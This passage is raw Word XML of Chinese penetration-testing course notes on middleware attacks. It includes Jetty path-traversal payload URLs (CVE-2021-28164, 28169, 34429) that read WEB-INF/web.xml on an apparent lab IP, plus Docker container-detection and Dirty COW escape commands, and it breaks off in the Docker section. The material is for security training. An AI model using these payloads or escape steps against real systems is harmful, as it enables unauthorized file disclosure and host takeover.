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media/image1.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pic="http://schemas.openxmlformats.org/drawingml/2006/picture" xmlns:xml="http://www.w3.org/XML/1998/namespace" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing">
  <w:body>
    <w:p>
      <w:pPr>
        <w:pStyle w:val=""/>
        <w:numPr/>
        <w:pBdr>
          <w:bottom w:sz="8" w:color="fc0403" w:val="triple"/>
        </w:pBdr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rStyle w:val=""/>
          <w:rFonts w:cs="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:ascii="微软雅黑"/>
          <w:b w:val="false"/>
          <w:color w:val="FF0000"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:ascii="微软雅黑"/>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:strike w:val="false"/>
          <w:color w:val="FF0000"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="30"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>服务攻防-中间件安全&amp;CVE复现&amp;K8s&amp;Docker&amp;Jetty&amp;Websphere</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val=""/>
        <w:numPr/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rStyle w:val=""/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val=""/>
        </w:rPr>
        <w:drawing>
          <wp:inline distL="0" distR="0" distB="0" distT="0">
            <wp:extent cy="18728614" cx="5760085"/>
            <wp:effectExtent b="0" r="0" t="0" l="0"/>
            <wp:docPr descr="descript" name="picture" id="2"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="descript" name="picture" id="3"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="true">
                    <a:blip r:embed="rId5"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off y="0" x="0"/>
                      <a:ext cy="18728614" cx="5760085"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val=""/>
        </w:rPr>
        <w:drawing>
          <wp:inline distL="0" distR="0" distB="0" distT="0">
            <wp:extent cy="3823009" cx="5760085"/>
            <wp:effectExtent b="0" r="0" t="0" l="0"/>
            <wp:docPr descr="descript" name="picture" id="5"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="descript" name="picture" id="6"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="true">
                    <a:blip r:embed="rId6"/>
                    <a:srcRect/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off y="0" x="0"/>
                      <a:ext cy="3823009" cx="5760085"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val=""/>
        <w:numPr/>
        <w:pBdr>
          <w:bottom/>
        </w:pBdr>
        <w:rPr>
          <w:rStyle w:val=""/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val=""/>
        </w:rPr>
        <w:drawing>
          <wp:inline distL="0" distR="0" distB="0" distT="0">
            <wp:extent cy="5760085" cx="5760085"/>
            <wp:effectExtent b="0" r="0" t="0" l="0"/>
            <wp:docPr name="文本框 maddsg" id="8"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic>
              <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                <wps:wsp>
                  <wps:cNvSpPr txBox="true"/>
                  <wps:spPr>
                    <a:xfrm>
                      <a:off y="0" x="0"/>
                      <a:ext cy="5760085" cx="5760085"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:solidFill>
                      <a:srgbClr val="FAFAFA"/>
                    </a:solidFill>
                    <a:ln w="9525">
                      <a:solidFill>
                        <a:srgbClr val="000000">
                          <a:alpha val="10000"/>
                        </a:srgbClr>
                      </a:solidFill>
                    </a:ln>
                  </wps:spPr>
                  <wps:txbx>
                    <w:txbxContent>
                      <w:p>
                        <w:pPr>
                          <w:pStyle w:val="fio6k3"/>
                          <w:rPr/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rStyle w:val="c2puz6"/>
                          </w:rPr>
                          <w:t>#知识点：</w:t>
                        </w:r>
                      </w:p>
                      <w:p>
                        <w:pPr>
                          <w:pStyle w:val="fio6k3"/>
                          <w:rPr/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rStyle w:val="c2puz6"/>
                          </w:rPr>
                          <w:t>中间件及框架列表：</w:t>
                        </w:r>
                      </w:p>
                      <w:p>
                        <w:pPr>
                          <w:pStyle w:val="fio6k3"/>
                          <w:rPr/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rStyle w:val="c2puz6"/>
                          </w:rPr>
                          <w:t>IIS，Apache，Nginx，Tomcat，Docker</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr/>
                          <w:t>，K8s</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rStyle w:val="c2puz6"/>
                          </w:rPr>
                          <w:t>，Weblogic，JBoos，WebSphere，Jenkins ，GlassFish，Jetty</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rStyle w:val="j2z6ml"/>
                          </w:rPr>
                          <w:t>，</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rStyle w:val="c2puz6"/>
                          </w:rPr>
                          <w:t>Jira，Struts2，Laravel，Solr，Shiro，Thinkphp，Spring，Flask，jQuery</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rStyle w:val="j2z6ml"/>
                          </w:rPr>
                          <w:t>等</w:t>
                        </w:r>
                      </w:p>
                      <w:p>
                        <w:pPr>
                          <w:pStyle w:val="fio6k3"/>
                          <w:rPr/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rStyle w:val="c2puz6"/>
                          </w:rPr>
                          <w:t>0、中间件-K8s安全</w:t>
                        </w:r>
                      </w:p>
                      <w:p>
                        <w:pPr>
                          <w:pStyle w:val="fio6k3"/>
                          <w:rPr/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rStyle w:val="c2puz6"/>
                          </w:rPr>
                          <w:t>1、中间件</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rStyle w:val="ynmy6g"/>
                          </w:rPr>
                          <w:t>-</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rStyle w:val="c2puz6"/>
                          </w:rPr>
                          <w:t>Jetty安全</w:t>
                        </w:r>
                      </w:p>
                      <w:p>
                        <w:pPr>
                          <w:pStyle w:val="fio6k3"/>
                          <w:rPr/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rStyle w:val="c2puz6"/>
                          </w:rPr>
                          <w:t>2、中间件-Docker安全</w:t>
                        </w:r>
                      </w:p>
                      <w:p>
                        <w:pPr>
                          <w:pStyle w:val="fio6k3"/>
                          <w:rPr/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rStyle w:val="c2puz6"/>
                          </w:rPr>
                          <w:t>3、中间件-WebSphere安全</w:t>
                        </w:r>
                      </w:p>
                      <w:p>
                        <w:pPr>
                          <w:pStyle w:val="fio6k3"/>
                          <w:rPr/>
                        </w:pPr>
                      </w:p>
                      <w:p>
                        <w:pPr>
                          <w:pStyle w:val="fio6k3"/>
                          <w:rPr/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rStyle w:val="c2puz6"/>
                          </w:rPr>
                          <w:t>#章节内容：</w:t>
                        </w:r>
                      </w:p>
                      <w:p>
                        <w:pPr>
                          <w:pStyle w:val="fio6k3"/>
                          <w:rPr/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rStyle w:val="c2puz6"/>
                          </w:rPr>
                          <w:t>常见中间件的安全测试：</w:t>
                        </w:r>
                      </w:p>
                      <w:p>
                        <w:pPr>
                          <w:pStyle w:val="fio6k3"/>
                          <w:rPr/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rStyle w:val="c2puz6"/>
                          </w:rPr>
                          <w:t>1、配置不当-解析&amp;弱口令</w:t>
                        </w:r>
                      </w:p>
                      <w:p>
                        <w:pPr>
                          <w:pStyle w:val="fio6k3"/>
                          <w:rPr/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rStyle w:val="c2puz6"/>
                          </w:rPr>
                          <w:t>2、安全机制-特定安全漏洞</w:t>
                        </w:r>
                      </w:p>
                      <w:p>
                        <w:pPr>
                          <w:pStyle w:val="fio6k3"/>
                          <w:rPr/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rStyle w:val="c2puz6"/>
                          </w:rPr>
                          <w:t>3、安全机制-弱口令爆破攻击</w:t>
                        </w:r>
                      </w:p>
                      <w:p>
                        <w:pPr>
                          <w:pStyle w:val="fio6k3"/>
                          <w:rPr/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rStyle w:val="c2puz6"/>
                          </w:rPr>
                          <w:t>4、安全应用-框架特定安全漏洞</w:t>
                        </w:r>
                      </w:p>
                      <w:p>
                        <w:pPr>
                          <w:pStyle w:val="fio6k3"/>
                          <w:rPr/>
                        </w:pPr>
                      </w:p>
                      <w:p>
                        <w:pPr>
                          <w:pStyle w:val="fio6k3"/>
                          <w:rPr/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rStyle w:val="c2puz6"/>
                          </w:rPr>
                          <w:t>#前置知识：</w:t>
                        </w:r>
                      </w:p>
                      <w:p>
                        <w:pPr>
                          <w:pStyle w:val="fio6k3"/>
                          <w:rPr/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rStyle w:val="c2puz6"/>
                          </w:rPr>
                          <w:t>中间件安全测试流程：</w:t>
                        </w:r>
                      </w:p>
                      <w:p>
                        <w:pPr>
                          <w:pStyle w:val="fio6k3"/>
                          <w:rPr/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rStyle w:val="c2puz6"/>
                          </w:rPr>
                          <w:t>1、判断中间件信息-名称&amp;版本&amp;三方</w:t>
                        </w:r>
                      </w:p>
                      <w:p>
                        <w:pPr>
                          <w:pStyle w:val="fio6k3"/>
                          <w:rPr/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rStyle w:val="c2puz6"/>
                          </w:rPr>
                          <w:t>2、判断中间件问题-配置不当&amp;公开漏洞</w:t>
                        </w:r>
                      </w:p>
                      <w:p>
                        <w:pPr>
                          <w:pStyle w:val="fio6k3"/>
                          <w:rPr/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rStyle w:val="c2puz6"/>
                          </w:rPr>
                          <w:t>3、判断中间件利用-弱口令&amp;EXP&amp;框架漏洞</w:t>
                        </w:r>
                      </w:p>
                      <w:p>
                        <w:pPr>
                          <w:pStyle w:val="fio6k3"/>
                          <w:rPr/>
                        </w:pPr>
                      </w:p>
                      <w:p>
                        <w:pPr>
                          <w:pStyle w:val="fio6k3"/>
                          <w:rPr/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rStyle w:val="c2puz6"/>
                          </w:rPr>
                          <w:t>应用服务安全测试流程：见图</w:t>
                        </w:r>
                      </w:p>
                      <w:p>
                        <w:pPr>
                          <w:pStyle w:val="fio6k3"/>
                          <w:rPr/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rStyle w:val="c2puz6"/>
                          </w:rPr>
                          <w:t>1、判断服务开放情况-端口扫描&amp;组合应用等</w:t>
                        </w:r>
                      </w:p>
                      <w:p>
                        <w:pPr>
                          <w:pStyle w:val="fio6k3"/>
                          <w:rPr/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rStyle w:val="c2puz6"/>
                          </w:rPr>
                          <w:t>2、判断服务类型归属-数据库&amp;文件传输&amp;通讯等</w:t>
                        </w:r>
                      </w:p>
                      <w:p>
                        <w:pPr>
                          <w:pStyle w:val="kh7pln"/>
                          <w:rPr>
                            <w:rStyle w:val=""/>
                          </w:rPr>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rStyle w:val="c2puz6"/>
                          </w:rPr>
                          <w:t>3、判断服务利用方式-特定漏洞&amp;未授权&amp;弱口令等</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </wps:txbx>
                  <wps:bodyPr anchorCtr="false" forceAA="false" rtlCol="false" anchor="t" vertOverflow="overflow" wrap="square" spcFirstLastPara="false" compatLnSpc="true" horzOverflow="overflow" rIns="114300" lIns="400050" spcCol="0" numCol="1" rot="0" tIns="114300" fromWordArt="false" vert="horz" bIns="114300">
                    <a:prstTxWarp prst="textNoShape">
                      <a:avLst/>
                    </a:prstTxWarp>
                    <a:spAutoFit/>
                  </wps:bodyPr>
                </wps:wsp>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val=""/>
        <w:numPr/>
        <w:pBdr>
          <w:bottom w:sz="8" w:color="030103" w:val="thinThickThinSmallGap"/>
        </w:pBdr>
        <w:rPr>
          <w:rStyle w:val=""/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val=""/>
        <w:numPr/>
        <w:pBdr>
          <w:bottom w:sz="8" w:color="030402" w:val="thinThickThinSmallGap"/>
        </w:pBdr>
        <w:rPr>
          <w:rStyle w:val=""/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:shd w:fill="FFFF00" w:color="auto" w:val="clear"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val=""/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:shd w:fill="FFFF00" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t>演示案例：</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中间件-K8s-搜哈</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中间件-Jetty-搜哈</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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val=""/>
          <w:rFonts w:cs="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:ascii="微软雅黑"/>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:strike w:val="false"/>
          <w:color w:val="FF0000"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="28"/>
          <w:u w:val="none"/>
          <w:shd w:fill="FFFFFF" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t>Docker</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val=""/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:shd w:fill="FFFFFF" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t>-搜哈</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中间件-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:ascii="微软雅黑"/>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:strike w:val="false"/>
          <w:color w:val="FF0000"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="28"/>
          <w:u w:val="none"/>
          <w:shd w:fill="FFFFFF" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t>WebSphere</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val=""/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:shd w:fill="FFFFFF" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t>-搜哈</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val=""/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:sz="8" w:color="030402" w:val="thinThickThinSmallGap"/>
        </w:pBdr>
        <w:ind/>
        <w:rPr>
          <w:rStyle w:val=""/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:shd w:fill="FFFFFF" w:color="auto" w:val="clear"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val=""/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:shd w:fill="FFFFFF" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t>配合下-Fofa_Viewer-搜哈</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val=""/>
        <w:numPr/>
        <w:pBdr>
          <w:bottom/>
        </w:pBdr>
        <w:rPr>
          <w:rStyle w:val=""/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:shd w:fill="FFFF00" w:color="auto" w:val="clear"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val=""/>
        </w:rPr>
        <w:drawing>
          <wp:inline distL="0" distR="0" distB="0" distT="0">
            <wp:extent cy="5760085" cx="5760085"/>
            <wp:effectExtent b="0" r="0" t="0" l="0"/>
            <wp:docPr name="文本框 jam5i8" id="10"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic>
              <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                <wps:wsp>
                  <wps:cNvSpPr txBox="true"/>
                  <wps:spPr>
                    <a:xfrm>
                      <a:off y="0" x="0"/>
                      <a:ext cy="5760085" cx="5760085"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:solidFill>
                      <a:srgbClr val="FAFAFA"/>
                    </a:solidFill>
                    <a:ln w="9525">
                      <a:solidFill>
                        <a:srgbClr val="000000">
                          <a:alpha val="10000"/>
                        </a:srgbClr>
                      </a:solidFill>
                    </a:ln>
                  </wps:spPr>
                  <wps:txbx>
                    <w:txbxContent>
                      <w:p>
                        <w:pPr>
                          <w:pStyle w:val="fio6k3"/>
                          <w:rPr/>
                        </w:pPr>
                        <w:r>
                          <w:rPr/>
                          <w:t>#</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rStyle w:val="c2puz6"/>
                          </w:rPr>
                          <w:t>中间件-K8s-搜哈</w:t>
                        </w:r>
                      </w:p>
                      <w:p>
                        <w:pPr>
                          <w:pStyle w:val="fio6k3"/>
                          <w:rPr/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rStyle w:val="c2puz6"/>
                          </w:rPr>
                          <w:t>kubernetes简称 k8s，是一个由google开源的，用于自动部署，扩展和管理容器化应用程序的开源系统。在B站内部，k8s在管理生产级容器和应用服务部署已经有较为广泛和成熟的应用。通过k8s，可跨多台主机进行容器编排、快速按需扩展容器化应用及其资源、对应用实施状况检查、服务发现和负载均衡等。</w:t>
                        </w:r>
                      </w:p>
                      <w:p>
                        <w:pPr>
                          <w:pStyle w:val="fio6k3"/>
                          <w:rPr/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rStyle w:val="c2puz6"/>
                          </w:rPr>
                          <w:t>https://blog.csdn.net/w1590191166/article/details/122028001</w:t>
                        </w:r>
                      </w:p>
                      <w:p>
                        <w:pPr>
                          <w:pStyle w:val="fio6k3"/>
                          <w:rPr/>
                        </w:pPr>
                      </w:p>
                      <w:p>
                        <w:pPr>
                          <w:pStyle w:val="fio6k3"/>
                          <w:rPr/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rStyle w:val="c2puz6"/>
                          </w:rPr>
                          <w:t>#中间件-Jetty-搜哈</w:t>
                        </w:r>
                      </w:p>
                      <w:p>
                        <w:pPr>
                          <w:pStyle w:val="fio6k3"/>
                          <w:rPr/>
                        </w:pPr>
                        <w:r>
                          <w:rPr/>
                          <w:t>E</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rStyle w:val="c2puz6"/>
                          </w:rPr>
                          <w:t>lipse Jetty是一个开源的servlet容器，它为基于Java的Web容器提供运行环境。</w:t>
                        </w:r>
                      </w:p>
                      <w:p>
                        <w:pPr>
                          <w:pStyle w:val="fio6k3"/>
                          <w:rPr/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rStyle w:val="c2puz6"/>
                          </w:rPr>
                          <w:t>CVE-2021-28164</w:t>
                        </w:r>
                      </w:p>
                      <w:p>
                        <w:pPr>
                          <w:pStyle w:val="fio6k3"/>
                          <w:rPr/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rStyle w:val="c2puz6"/>
                          </w:rPr>
                          <w:t>http://123.58.236.76:63126/%2e/WEB-INF/web.xml</w:t>
                        </w:r>
                      </w:p>
                      <w:p>
                        <w:pPr>
                          <w:pStyle w:val="fio6k3"/>
                          <w:rPr/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rStyle w:val="c2puz6"/>
                          </w:rPr>
                          <w:t>CVE-2021-28169</w:t>
                        </w:r>
                      </w:p>
                      <w:p>
                        <w:pPr>
                          <w:pStyle w:val="fio6k3"/>
                          <w:rPr/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rStyle w:val="c2puz6"/>
                          </w:rPr>
                          <w:t>http://123.58.236.76:63126/static?/WEB-INF/web.xml</w:t>
                        </w:r>
                      </w:p>
                      <w:p>
                        <w:pPr>
                          <w:pStyle w:val="fio6k3"/>
                          <w:rPr/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rStyle w:val="c2puz6"/>
                          </w:rPr>
                          <w:t>CVE-2021-34429</w:t>
                        </w:r>
                      </w:p>
                      <w:p>
                        <w:pPr>
                          <w:pStyle w:val="fio6k3"/>
                          <w:rPr/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rStyle w:val="c2puz6"/>
                          </w:rPr>
                          <w:t>http://123.58.236.76:63126/%u002e/WEB-INF/web.xml</w:t>
                        </w:r>
                      </w:p>
                      <w:p>
                        <w:pPr>
                          <w:pStyle w:val="fio6k3"/>
                          <w:rPr/>
                        </w:pPr>
                      </w:p>
                      <w:p>
                        <w:pPr>
                          <w:pStyle w:val="fio6k3"/>
                          <w:rPr/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rStyle w:val="c2puz6"/>
                          </w:rPr>
                          <w:t>#中间件-Docker-搜哈</w:t>
                        </w:r>
                      </w:p>
                      <w:p>
                        <w:pPr>
                          <w:pStyle w:val="fio6k3"/>
                          <w:rPr/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rStyle w:val="c2puz6"/>
                          </w:rPr>
                          <w:t>Docker容器是使用沙盒机制，是单独的系统，理论上是很安全的，通过利用某种手段，再结合执行POC或EXP，就可以返回一个宿主机的高权限Shell，并拿到宿主机的root权限，可以直接操作宿主机文件。 它从容器中逃了出来，因此我们形象的称为Docker逃逸漏洞。</w:t>
                        </w:r>
                      </w:p>
                      <w:p>
                        <w:pPr>
                          <w:pStyle w:val="fio6k3"/>
                          <w:rPr/>
                        </w:pPr>
                        <w:r>
                          <w:rPr/>
                          <w:t>1、容器判断：</w:t>
                        </w:r>
                      </w:p>
                      <w:p>
                        <w:pPr>
                          <w:pStyle w:val="fio6k3"/>
                          <w:rPr/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rStyle w:val="c2puz6"/>
                          </w:rPr>
                          <w:t>-是否存在.dockerenv文件</w:t>
                        </w:r>
                      </w:p>
                      <w:p>
                        <w:pPr>
                          <w:pStyle w:val="fio6k3"/>
                          <w:rPr/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rStyle w:val="c2puz6"/>
                          </w:rPr>
                          <w:t>ls -alh /.dockerenv</w:t>
                        </w:r>
                      </w:p>
                      <w:p>
                        <w:pPr>
                          <w:pStyle w:val="fio6k3"/>
                          <w:rPr/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rStyle w:val="c2puz6"/>
                          </w:rPr>
                          <w:t>-查询系统进程的cgroup信息：</w:t>
                        </w:r>
                      </w:p>
                      <w:p>
                        <w:pPr>
                          <w:pStyle w:val="oth9xn"/>
                          <w:rPr/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rStyle w:val="c2puz6"/>
                          </w:rPr>
                          <w:t>cat /proc/1/cgroup</w:t>
                        </w:r>
                      </w:p>
                      <w:p>
                        <w:pPr>
                          <w:pStyle w:val="fio6k3"/>
                          <w:rPr/>
                        </w:pPr>
                      </w:p>
                      <w:p>
                        <w:pPr>
                          <w:pStyle w:val="fio6k3"/>
                          <w:rPr/>
                        </w:pPr>
                        <w:r>
                          <w:rPr/>
                          <w:t>2、容器逃逸漏洞：权限提升</w:t>
                        </w:r>
                      </w:p>
                      <w:p>
                        <w:pPr>
                          <w:pStyle w:val="fio6k3"/>
                          <w:rPr/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rStyle w:val="c2puz6"/>
                          </w:rPr>
                          <w:t>-由内核漏洞引起 ——Dirty COW(CVE-2016-5195)</w:t>
                        </w:r>
                      </w:p>
                      <w:p>
                        <w:pPr>
                          <w:pStyle w:val="fio6k3"/>
                          <w:rPr/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rStyle w:val="c2puz6"/>
                          </w:rPr>
                          <w:t>-由 Docker 软件设计引起——CVE-2019-5736、CVE-2019-14271，CVE-2020-15257</w:t>
                        </w:r>
                      </w:p>
                      <w:p>
                        <w:pPr>
                          <w:pStyle w:val="oth9xn"/>
                          <w:rPr/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rStyle w:val="c2puz6"/>
                          </w:rPr>
                          <w:t>-由配置不当引起——开启privileged（特权模式）+宿主机目录挂载（文件挂载）、功能（capabilities）机制、sock通信方式</w:t>
                        </w:r>
                      </w:p>
                      <w:p>
                        <w:pPr>
                          <w:pStyle w:val="oth9xn"/>
                          <w:rPr/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rStyle w:val="c2puz6"/>
                          </w:rPr>
                          <w:t>-CVE-2016-5195</w:t>
                        </w:r>
                      </w:p>
                      <w:p>
                        <w:pPr>
                          <w:pStyle w:val="oth9xn"/>
                          <w:rPr/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rStyle w:val="c2puz6"/>
                          </w:rPr>
                          <w:t>https://github.com/gebl/dirtycow-docker-vdso</w:t>
                        </w:r>
                      </w:p>
                      <w:p>
                        <w:pPr>
                          <w:pStyle w:val="oth9xn"/>
                          <w:rPr/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rStyle w:val="c2puz6"/>
                          </w:rPr>
                          <w:t>https://www.ichunqiu.com/experiment/catalog?id=100295</w:t>
                        </w:r>
                      </w:p>
                      <w:p>
                        <w:pPr>
                          <w:pStyle w:val="oth9xn"/>
                          <w:rPr/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rStyle w:val="c2puz6"/>
                          </w:rPr>
                          <w:t># 使用本地1234端口连接docker的1234端口运行dirtycow镜像，并将其临时命名为test</w:t>
                        </w:r>
                      </w:p>
                      <w:p>
                        <w:pPr>
                          <w:pStyle w:val="oth9xn"/>
                          <w:rPr/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rStyle w:val="c2puz6"/>
                          </w:rPr>
                          <w:t># 其中 test：为临时名称，可以自定义填写。 -p： 第一个端口为本机的端口，第二个端口为Docker的端口。 -itd：意思是在后台运行，交互式运行，并且输出当前的信息 /bin/bash：调用Shell</w:t>
                        </w:r>
                      </w:p>
                      <w:p>
                        <w:pPr>
                          <w:pStyle w:val="oth9xn"/>
                          <w:rPr/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rStyle w:val="c2puz6"/>
                          </w:rPr>
                          <w:t xml:space="preserve">docker run --name=test -p 1234:1234 -itd dirtycow /bin/bash </w:t>
                        </w:r>
                      </w:p>
                      <w:p>
                        <w:pPr>
                          <w:pStyle w:val="oth9xn"/>
                          <w:rPr/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rStyle w:val="c2puz6"/>
                          </w:rPr>
                          <w:t># 进入镜像内部</w:t>
                        </w:r>
                      </w:p>
                      <w:p>
                        <w:pPr>
                          <w:pStyle w:val="oth9xn"/>
                          <w:rPr/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rStyle w:val="c2puz6"/>
                          </w:rPr>
                          <w:t>docker exec -it test /bin/bash</w:t>
                        </w:r>
                      </w:p>
                      <w:p>
